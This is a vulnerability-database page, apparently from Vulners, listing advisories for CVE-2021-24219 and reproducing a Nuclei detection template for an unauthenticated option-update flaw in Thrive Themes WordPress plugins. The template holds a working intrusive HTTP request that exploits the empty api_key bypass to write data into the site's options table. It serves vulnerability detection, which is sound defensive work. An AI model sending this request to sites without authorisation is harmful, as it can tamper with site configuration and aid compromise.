| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-24219 | 24 Sep 202505:15 | – | circl | |
| Wordpress plugin Controlled Admin Access 访问控制错误漏洞 | 12 Apr 202100:00 | – | cnnvd | |
| CVE-2021-24219 | 12 Apr 202114:02 | – | cve | |
| CVE-2021-24219 All Thrive Themes and Plugins - Unauthenticated Option Update | 12 Apr 202114:02 | – | cvelist | |
| EUVD-2021-11133 | 12 Apr 202114:02 | – | euvd | |
| CVE-2021-24219 | 12 Apr 202114:15 | – | nvd | |
| CVE-2021-24219 | 12 Apr 202114:15 | – | osv | |
| Design/Logic Flaw | 12 Apr 202114:15 | – | prion | |
| PT-2021-15763 | 12 Apr 202100:00 | – | ptsecurity | |
| CVE-2021-24219 | 22 May 202521:05 | – | redhatcve |
id: CVE-2021-24219
info:
name: All Thrive Themes and Plugins - Unauthenticated Option Update
author: DhiyaneshDk
severity: medium
description: |
The Thrive Optimize WordPress plugin before 1.4.13.3, Thrive Comments WordPress plugin before 1.4.15.3, Thrive Headline Optimizer WordPress plugin before 1.3.7.3, Thrive Leads WordPress plugin before 2.3.9.4, Thrive Ultimatum WordPress plugin before 2.3.9.4, Thrive Quiz Builder WordPress plugin before 2.3.9.4, Thrive Apprentice WordPress plugin before 2.3.9.4, Thrive Visual Editor WordPress plugin before 2.6.7.4, Thrive Dashboard WordPress plugin before 2.3.9.3, Thrive Ovation WordPress plugin before 2.4.5, Thrive Clever Widgets WordPress plugin before 1.57.1 and Rise by Thrive Themes WordPress theme before 2.0.0, Ignition by Thrive Themes WordPress theme before 2.0.0, Luxe by Thrive Themes WordPress theme before 2.0.0, FocusBlog by Thrive Themes WordPress theme before 2.0.0, Minus by Thrive Themes WordPress theme before 2.0.0, Squared by Thrive Themes WordPress theme before 2.0.0, Voice WordPress theme before 2.0.0, Performag by Thrive Themes WordPress theme before 2.0.0, Pressive by Thrive Themes WordPress theme before 2.0.0, Storied by Thrive Themes WordPress theme before 2.0.0, Thrive Themes Builder WordPress theme before 2.2.4 register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.
impact: |
Unauthenticated attackers can arbitrarily add data to WordPress options table via Zapier endpoint, potentially modifying critical site configuration and compromising site integrity.
remediation: |
Update all affected Thrive plugins and themes to their latest versions.
reference:
- https://www.wordfence.com/blog/2021/03/recently-patched-vulnerability-in-thrive-themes-actively-exploited-in-the-wild
- https://wpscan.com/vulnerability/35acd2d8-85fc-4af5-8f6c-224fa7d92900/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2021-24219
cwe-id: CWE-306,CWE-284
epss-score: 0.02076
epss-percentile: 0.79206
cpe: cpe:2.3:a:thrivethemes:focusblog:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thrivethemes
product: focusblog
framework: wordpress
tags: cve,cve2021,wpscan,wordpress,wp,wp-plugin,thrivethemes,intrusive,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
hook_url={"http:\/\/key":"{{filename}}.php"}&api_key=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "td_optin_webhook"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100ef3dfb4c000a3bf5ed95a670be14da83b6e7c5dbd4fc4539e4925823d2790e5d02201dccfa3422e7f2e124738d4a3edb31cf68642bf53587b4206e47b75a88f467f4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation